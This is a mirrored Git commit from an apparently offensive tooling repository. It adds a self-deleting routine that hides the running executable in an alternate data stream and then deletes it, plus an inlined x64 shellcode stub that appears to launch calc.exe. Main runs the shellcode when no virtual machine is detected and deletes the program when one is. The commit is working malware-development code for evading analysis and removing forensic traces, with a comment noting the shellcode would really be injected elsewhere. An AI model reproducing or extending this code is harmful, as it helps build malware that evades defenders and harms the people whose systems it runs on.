mirror of
https://github.com/0xTriboulet/T-1
synced 2026-06-06 15:14:27 +00:00
Implemented InlinedShellcodeExecution and DeleteSelfFromDisk functions
This commit is contained in:
Binary file not shown.
@@ -0,0 +1 @@
|
||||
BOOL DeleteSelfFromDisk();
|
||||
@@ -0,0 +1 @@
|
||||
VOID InlinedShellcodeExecution();
|
||||
+3
-1
@@ -15,4 +15,6 @@
|
||||
#include "GetProcessCountViaSnapShot.h"
|
||||
#include "GetUniqueUserCountViaSnapshot.h"
|
||||
#include "AbsoluteValue.h"
|
||||
#include "VmDetection.h"
|
||||
#include "VmDetection.h"
|
||||
#include "InlinedShellcodeExecution.h"
|
||||
#include "DeleteSelfFromDisk.h"
|
||||
@@ -0,0 +1,67 @@
|
||||
/*
|
||||
* Strongly based on the implementation available on maldevacademy.com
|
||||
*/
|
||||
|
||||
#include "intelligence.h"
|
||||
|
||||
// Custom FILE_RENAME_INFO structure definition
|
||||
typedef struct _FILE_RENAME_INFO_EX {
|
||||
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN10_RS1)
|
||||
union {
|
||||
BOOLEAN ReplaceIfExists;
|
||||
DWORD Flags;
|
||||
} DUMMYUNIONNAME;
|
||||
#else
|
||||
BOOLEAN ReplaceIfExists;
|
||||
#endif
|
||||
HANDLE RootDirectory;
|
||||
DWORD FileNameLength;
|
||||
WCHAR FileName[MAX_PATH]; // Instead of FileName[1]
|
||||
} FILE_RENAME_INFO_EX, * PFILE_RENAME_INFO_EX;
|
||||
|
||||
|
||||
BOOL DeleteSelfFromDisk() {
|
||||
|
||||
CONST WCHAR NEW_STREAM[7] = L":%x%x\x00";
|
||||
BOOL bSTATE = FALSE;
|
||||
WCHAR szFileName[MAX_PATH * 2] = { 0x00 };
|
||||
FILE_RENAME_INFO_EX FileRenameInfo_Ex = { .ReplaceIfExists = FALSE, .RootDirectory = 0x00 , .FileNameLength = sizeof(NEW_STREAM)};
|
||||
FILE_DISPOSITION_INFO FileDisposalInfo = { .DeleteFile = TRUE };
|
||||
HANDLE hLocalImgFileHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
if (GetModuleFileNameW(NULL, szFileName, (MAX_PATH * 2)) == 0x00) {
|
||||
PRINT("[!] GetModuleFileNameW Failed With Error: %ld \n", GetLastError());
|
||||
goto _END_OF_FUNC;
|
||||
}
|
||||
|
||||
swprintf(FileRenameInfo_Ex.FileName, MAX_PATH, NEW_STREAM, rand(), rand() * rand());
|
||||
|
||||
if ((hLocalImgFileHandle = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0x0, NULL)) == INVALID_HANDLE_VALUE) {
|
||||
PRINT("[!] CreateFileW [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
|
||||
goto _END_OF_FUNC;
|
||||
}
|
||||
|
||||
if (!SetFileInformationByHandle(hLocalImgFileHandle, FileRenameInfo, &FileRenameInfo_Ex, sizeof(FILE_RENAME_INFO_EX))) {
|
||||
PRINT("[!] SetFileInformationByHandle [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
|
||||
goto _END_OF_FUNC;
|
||||
}
|
||||
|
||||
CloseHandle(hLocalImgFileHandle);
|
||||
|
||||
if ((hLocalImgFileHandle = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0x0, NULL)) == INVALID_HANDLE_VALUE) {
|
||||
PRINT("[!] CreateFileW [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
|
||||
goto _END_OF_FUNC;
|
||||
}
|
||||
|
||||
if (!SetFileInformationByHandle(hLocalImgFileHandle, FileDispositionInfo, &FileDisposalInfo, sizeof(FileDisposalInfo))) {
|
||||
PRINT("[!] SetFileInformationByHandle [%d] Failed With Error: %ld \n", __LINE__, GetLastError());
|
||||
goto _END_OF_FUNC;
|
||||
}
|
||||
|
||||
bSTATE = TRUE;
|
||||
|
||||
_END_OF_FUNC:
|
||||
if (hLocalImgFileHandle != INVALID_HANDLE_VALUE)
|
||||
CloseHandle(hLocalImgFileHandle);
|
||||
return bSTATE;
|
||||
}
|
||||
@@ -0,0 +1,8 @@
|
||||
void InlinedShellcodeExecution(){
|
||||
|
||||
|
||||
// Inlined shellcode. IRL this should be injected somewhere, somehow
|
||||
asm(".byte 0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6;");
|
||||
|
||||
}
|
||||
|
||||
+3
-1
@@ -19,11 +19,13 @@ int main(){
|
||||
|
||||
// TODO: ShellcodeDetonation
|
||||
PRINT("[i] Executing shellcode!\n");
|
||||
InlinedShellcodeExecution();
|
||||
|
||||
}else{
|
||||
|
||||
// TODO: SelfDelete
|
||||
PRINT("[i] Self-deleting!\n");
|
||||
PRINT("[i] VM Detected. Self-deleting!\n");
|
||||
DeleteSelfFromDisk();
|
||||
|
||||
}
|
||||
|
||||
|
||||
Reference in New Issue
Block a user